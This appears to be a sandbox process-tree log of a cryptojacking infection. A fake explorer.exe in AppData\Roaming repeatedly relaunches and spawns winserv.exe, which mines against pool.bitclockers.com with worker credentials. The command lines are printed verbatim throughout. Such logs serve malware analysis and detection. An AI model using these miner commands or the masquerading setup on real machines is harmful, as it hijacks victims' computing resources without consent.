C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:876
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3352
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1828
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2644
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3404
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3900
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2016
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3436
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:716
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:540
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2060
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:232
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5596
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3932
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5380
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1204
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5800
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2512
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3040
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3720
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4292
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3712
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5736
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5784
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:944
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4876
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1912
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1032
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4496
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3360
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4972
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5272
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4108
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2908
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5860
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:232
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1580
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4196
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5420
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4040
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5052
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5064
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3192
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4968
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:248
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4868
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4912
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3176
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3484
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2768
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1032
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6120
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5884
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:740
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3564
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5164
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5400
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4540
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4092
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3132
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5788
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5452
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5796
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:240
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5028
-
